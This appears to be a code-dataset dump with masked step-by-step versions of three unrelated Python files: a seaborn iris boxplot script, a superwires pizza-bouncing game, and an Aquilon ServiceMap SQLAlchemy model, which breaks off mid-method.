iris = pd.read_csv("finalOutputV1.csv") # the iris dataset is now a Pandas DataFrame
# We can look at an individual feature in Seaborn through a boxplot
sns.boxplot(x="Species", y="PetalLengthCm", data=iris)
plt.show()
|
normal
|
{
"blob_id": "0125abab0312d8f007e76ee710348efc9daae31e",
"index": 4989,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwarnings.filterwarnings('ignore')\n<mask token>\nsns.set(style='white', color_codes=True)\n<mask token>\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-3": "<mask token>\nwarnings.filterwarnings('ignore')\n<mask token>\nsns.set(style='white', color_codes=True)\niris = pd.read_csv('finalOutputV1.csv')\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-4": "import pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style='white', color_codes=True)\niris = pd.read_csv('finalOutputV1.csv')\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-5": "# First, we'll import pandas, a data processing and CSV file I/O library\nimport pandas as pd\n\n# We'll also import seaborn, a Python graphing library\nimport warnings # current version of seaborn generates a bunch of warnings that we'll ignore\n\nwarnings.filterwarnings(\"ignore\")\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(style=\"white\", color_codes=True)\n\n# Next, we'll load the Iris flower dataset, which is in the \"../input/\" directory\niris = pd.read_csv(\"finalOutputV1.csv\") # the iris dataset is now a Pandas DataFrame\n# We can look at an individual feature in Seaborn through a boxplot\nsns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
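A small follow-up sketch, not in the record: the same DataFrame and columns could be reused to overlay the individual observations on top of the box plot.

import seaborn as sns
import matplotlib.pyplot as plt

# Assumes the iris DataFrame and column names from the snippet above.
sns.boxplot(x='Species', y='PetalLengthCm', data=iris)
sns.stripplot(x='Species', y='PetalLengthCm', data=iris, color='black', size=3)
plt.show()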
<|reserved_special_token_0|>
class Pan(games.Sprite):
<|reserved_special_token_0|>
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
<|reserved_special_token_0|>
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
bg_img = games.load_image('images/pizzeria.jpg', transparent=True)
pizza_img = games.load_image('images/pizza.png')
pan_img = games.load_image('images/mousepoint.png')
games.screen.background = bg_img
pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen
.height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))
pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)
score = ScText(value=SCORE, size=60, is_collideable=False, color=color.
black, x=550, y=30)
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
games.mouse.is_visible = False
games.screen.event_grab = False
games.screen.mainloop()
games.screen.add(score)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from superwires import games, color
import random
SCORE = 0
games.init(screen_width=640, screen_height=480, fps=50)
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
bg_img = games.load_image('images/pizzeria.jpg', transparent=True)
pizza_img = games.load_image('images/pizza.png')
pan_img = games.load_image('images/mousepoint.png')
games.screen.background = bg_img
pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen
.height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))
pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)
score = ScText(value=SCORE, size=60, is_collideable=False, color=color.
black, x=550, y=30)
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
games.mouse.is_visible = False
games.screen.event_grab = False
games.screen.mainloop()
games.screen.add(score)
main()
<|reserved_special_token_1|>
from superwires import games, color
import random
SCORE = 0
## pizza_image= games.load_image("images/pizza.png")
## pizza = games.Sprite(image = pizza_image, x=SW/2, y=SH/2,
## dx =1, dy = 1)
## games.screen.add(pizza)
games.init(screen_width = 640, screen_height = 480, fps = 50)
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
#self.y = games.mouse.y
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
#bouncing
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
#SCORE += 1
#if self.bottom > games.screen.height or
if self.top < 0:
self.dy = -self.dy
#SCORE += 1
## if self.left > games.screen.width:
## self.right = 0
## SCORE +=1
## if self.right<0:
## self.left = games.screen.width
## SCORE +=1
##
## if self.top > games.screen.height:
## self.top = 0
## SCORE +=1
## if self.bottom < 0:
## self.bottom = games.screen.height
## SCORE +=1
##
def handle_collide(self):
#self.x = random.randrange(games.screen.width)
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
# loaded img
bg_img = games.load_image("images/pizzeria.jpg", transparent = True)
pizza_img = games.load_image("images/pizza.png")
pan_img = games.load_image("images/mousepoint.png")
#added img to bg
games.screen.background = bg_img
#create pizza obj
pizza = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza2 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza3 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza4 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
#create pan obj
pan = Pan(image = pan_img, x=games.mouse.x, y=games.mouse.y)
#create txt obj
score = ScText(value = SCORE, size = 60,
is_collideable = False,
color = color.black,
x = 550,
y = 30)
#draw objs to screen
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
#sets visibility of mouse while on screen
games.mouse.is_visible = False
#locks mouse to screen if True
games.screen.event_grab = False
#start mainloop
games.screen.mainloop()
#score = games.Text(value = "welcome", size = 60, color = color.black, x = 550, y = 30)
games.screen.add(score)
#### won_message = games.Message(value = "You lose!", color = color.blue, size = 100, x = games.screen.width/2, y = games.screen.height/2, lifetime = 250, after_death = games.screen.quit)
#### games.screen.add(won_message)
##game_over = games.Message(value = "Game Over",
## size = 100,
## color = color.blue,
## x = games.screen.width/2
## y = games.screen.height/2
## lifetime = 250,
## after_death = games.screen.quit)
##games.screen.add(game_over)
main()
##angle - Facing in degrees
##
##x - x-coordinate
##
##y - y-coordinate
##
##dx - x velocity
##
##dy - y velocity
##
##left - x-coordinate of left sprite edge
##
##right - x-coordinate of right sprite edge
##
##top - y-coordinate of top sprite edge
##
##bottom - y-coordinate of bottom sprite edge
##
##image - image object of sprite
##
##overlapping_sprites - List of other objects that overlap sprite
##
##is_collideable - Whether or not the sprite is collideable. True means sprite will register in collisions. False means sprite will not show up in collisions.
##Methods
##
##update() - Updates sprite. Automatically called every mainloop() cycle.
##
##destroy() - Removes sprite from the screen
|
flexible
|
{
"blob_id": "ee16b91ce1c12ce78d23ff655304aebc39cb1639",
"index": 9693,
"step-1": "<mask token>\n\n\nclass Pan(games.Sprite):\n <mask token>\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n <mask token>\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\ndef main():\n bg_img = games.load_image('images/pizzeria.jpg', transparent=True)\n pizza_img = games.load_image('images/pizza.png')\n pan_img = games.load_image('images/mousepoint.png')\n games.screen.background = bg_img\n pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen\n .height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))\n pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)\n score = ScText(value=SCORE, size=60, is_collideable=False, color=color.\n black, x=550, y=30)\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n games.mouse.is_visible = False\n games.screen.event_grab = False\n games.screen.mainloop()\n games.screen.add(score)\n\n\n<mask token>\n",
"step-4": "from superwires import games, color\nimport random\nSCORE = 0\ngames.init(screen_width=640, screen_height=480, fps=50)\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\ndef main():\n bg_img = games.load_image('images/pizzeria.jpg', transparent=True)\n pizza_img = games.load_image('images/pizza.png')\n pan_img = games.load_image('images/mousepoint.png')\n games.screen.background = bg_img\n pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen\n .height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))\n pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)\n score = ScText(value=SCORE, size=60, is_collideable=False, color=color.\n black, x=550, y=30)\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n games.mouse.is_visible = False\n games.screen.event_grab = False\n games.screen.mainloop()\n games.screen.add(score)\n\n\nmain()\n",
"step-5": "from superwires import games, color\nimport random\n\nSCORE = 0\n\n\n\n\n \n## pizza_image= games.load_image(\"images/pizza.png\")\n## pizza = games.Sprite(image = pizza_image, x=SW/2, y=SH/2,\n## dx =1, dy = 1)\n## games.screen.add(pizza)\n\ngames.init(screen_width = 640, screen_height = 480, fps = 50)\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n #self.y = games.mouse.y\n self.check_collide()\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n \n \nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n #bouncing \n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n #SCORE += 1\n\n #if self.bottom > games.screen.height or\n if self.top < 0:\n self.dy = -self.dy\n #SCORE += 1\n \n## if self.left > games.screen.width:\n## self.right = 0\n## SCORE +=1\n## if self.right<0:\n## self.left = games.screen.width\n## SCORE +=1\n##\n## if self.top > games.screen.height:\n## self.top = 0\n## SCORE +=1\n## if self.bottom < 0:\n## self.bottom = games.screen.height\n## SCORE +=1\n## \n def handle_collide(self):\n #self.x = random.randrange(games.screen.width)\n self.dy = -self.dy\n \n\n\nclass ScText(games.Text):\n def update(self):\n self.value = SCORE\n\ndef main():\n # loaded img\n bg_img = games.load_image(\"images/pizzeria.jpg\", transparent = True)\n pizza_img = games.load_image(\"images/pizza.png\")\n pan_img = games.load_image(\"images/mousepoint.png\")\n\n #added img to bg\n games.screen.background = bg_img\n\n #create pizza obj\n pizza = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza2 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza3 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza4 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n\n #create pan obj\n pan = Pan(image = pan_img, x=games.mouse.x, y=games.mouse.y)\n \n \n \n \n \n\n #create txt obj\n score = ScText(value = SCORE, size = 60,\n is_collideable = False,\n color = color.black,\n x = 550,\n y = 30)\n\n #draw objs to screen\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n \n #sets visibility of mouse while on screen\n games.mouse.is_visible = False\n\n #locks mouse to screen if True\n games.screen.event_grab = False\n\n\n #start mainloop\n games.screen.mainloop()\n\n\n #score = games.Text(value = \"welcome\", size = 60, color = color.black, x = 550, y = 30)\n games.screen.add(score)\n\n#### won_message = games.Message(value = \"You lose!\", color = color.blue, size = 100, x = games.screen.width/2, y = games.screen.height/2, lifetime = 250, after_death = games.screen.quit)\n#### games.screen.add(won_message)\n\n##game_over = games.Message(value = \"Game Over\",\n## size = 100,\n## color = color.blue,\n## x = games.screen.width/2\n## y = games.screen.height/2\n## lifetime = 250,\n## after_death = games.screen.quit)\n##games.screen.add(game_over)\n\nmain()\n\n\n\n\n\n##angle - Facing in degrees\n##\n##x - 
x-coordinate\n##\n##y - y-coordinate\n##\n##dx - x velocity\n##\n##dy - y velocity\n##\n##left - x-coordinate of left sprite edge\n##\n##right - x-coordinate of right sprite edge\n##\n##top - y-coordinate of top sprite edge\n##\n##bottom - y-coordinate of bottom sprite edge\n##\n##image - image object of sprite\n##\n##overlapping_sprites - List of other objects that overlap sprite\n##\n##is_collideable - Whether or not the sprite is collideable. True means sprite will register in collisions. False means sprite will not show up in collisions.\n\n##Methods\n##\n##update() - Updates sprite. Automatically called every mainloop() cycle.\n##\n##destroy() - Removes sprite from the screen\n",
"step-ids": [
7,
9,
10,
13,
14
]
}
|
[
7,
9,
10,
13,
14
] |
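One possible extension, not part of the record: ScText draws SCORE but nothing ever increments it, so a subclass that bumps the counter on each pan collision is a minimal way to make the displayed score move.

class ScoringPizza(Pizza):
    # Assumes Pizza and the module-level SCORE from the record above.
    def handle_collide(self):
        global SCORE
        SCORE += 1  # count each catch by the pan
        super(ScoringPizza, self).handle_collide()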
<|reserved_special_token_0|>
class ServiceMap(Base):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
                'A service should be mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ServiceMap(Base):
<|reserved_special_token_0|>
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
                'A service should be mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
                'A service should be mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
